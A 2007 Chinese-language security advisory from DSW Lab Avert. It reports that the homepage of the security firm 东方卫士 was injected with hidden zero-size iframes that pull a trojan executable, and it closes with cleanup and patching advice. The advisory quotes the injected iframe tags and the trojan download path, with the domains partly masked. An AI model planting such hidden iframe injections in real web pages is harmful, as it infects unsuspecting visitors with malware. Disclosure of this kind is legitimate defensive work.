出处：DSW Avert 时间：2007年03月01日

今日，DSW Lab Avert小组监测到国内知名安全网站，东方卫士主页被挂木马，在东方卫士主页上，通过查看页面源代码，可以看到网页中被插入一条“< iframe src=”指令，该指令将隐藏打开一个新的页面，这个页面伪造了浏览器无法开的错误网页，并在后台隐藏打开三个页面，进行木马下载。

打开的隐藏页面代码：

<iframe src=http://www.****.cn/33/Reflector/index.htm width=0 height=0 frameborder=0></iframe>

在打开的伪造错误页面中会打开三个网页：

<iframe src="http://www.****.cn/33/Reflector/4.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.****.cn/33/Reflector/2.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.*****.com/wm/20/5.htm" width="0" height="0" frameborder="0"></iframe>

下载木马：
http://www.****.cn/33/Reflector/1.exe

解决方案：

1、推荐安装超级巡警监测查杀以上木马。
2、请广大用户及时升级系统补丁，预防更多的IE漏洞攻击。
3、为了最快保障广大用户不受木马侵害，在事件解决前请暂时不要访问东方卫士网站。

注：这是继我们上次报道该网站被挂马后第二次挂马。

关于东方卫士：交大铭泰信息安全公司，国内知名信息安全厂商，该公司提供《东方卫士》系列防病毒产品、数据保护、无毒网关产品、防垃圾邮件产品、网络设备及系统集成和 OEM 定制服务。